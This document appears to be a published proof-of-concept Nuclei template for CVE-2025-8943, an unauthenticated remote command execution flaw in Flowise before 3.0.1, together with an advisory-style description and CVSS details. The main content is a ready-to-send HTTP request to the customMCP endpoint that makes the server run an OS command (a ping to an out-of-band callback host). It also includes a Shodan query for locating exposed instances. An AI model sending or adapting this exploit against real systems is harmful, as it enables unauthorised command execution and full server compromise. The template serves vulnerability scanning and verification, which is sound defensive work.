The Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, in Flowise versions before 3.0.1 the default installation operates without authentication unless explicitly configured. This combination allows unauthenticated network attackers to execute unsandboxed OS commands.
PoC代码[已公开]
id: CVE-2025-8943
info:
name: Flowise < 3.0.1 - Remote Command Execution
author: zezezez
severity: critical
description: |
The Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, in Flowise versions before 3.0.1 the default installation operates without authentication unless explicitly configured. This combination allows unauthenticated network attackers to execute unsandboxed OS commands.
impact: |
Successful exploitation allows attackers to execute arbitrary OS commands on the target server, potentially leading to complete system compromise, data theft, and lateral movement within the network.
remediation: |
Update Flowise to the latest version that addresses this vulnerability. Implement proper input validation and sanitization for the customMCP endpoint parameters.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-8943
- https://www.cve.org/CVERecord?id=CVE-2025-8943
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-8943
epss-score: 0.12126
epss-percentile: 0.93512
cwe-id: CWE-78
cpe: cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: flowiseai
product: flowise
shodan-query: http.title:"Flowise"
tags: cve,cve2025,rce,flowise,oast,fictional
http:
- raw:
- |
POST /api/v1/node-load-method/customMCP HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
x-request-from: internal
{
"inputs": {
"mcpServerConfig": {
"command": "ping",
"args": [
"{{interactsh-url}}",
"-c",
"4"
]
}
},
"loadMethod": "listActions"
}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains_all(body, "No Available Actions", "label\":")'
- 'contains_any(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 4b0a0048304602210092f3204380917a73eadee655dccc98b38303e5fe1e6403f6cef18ecb25f8ac55022100e962a54c032ab27d59b02339395138fbc2358da29c453d6c8dd307a534e70dc8:922c64590222798bb761d5b6d8e72950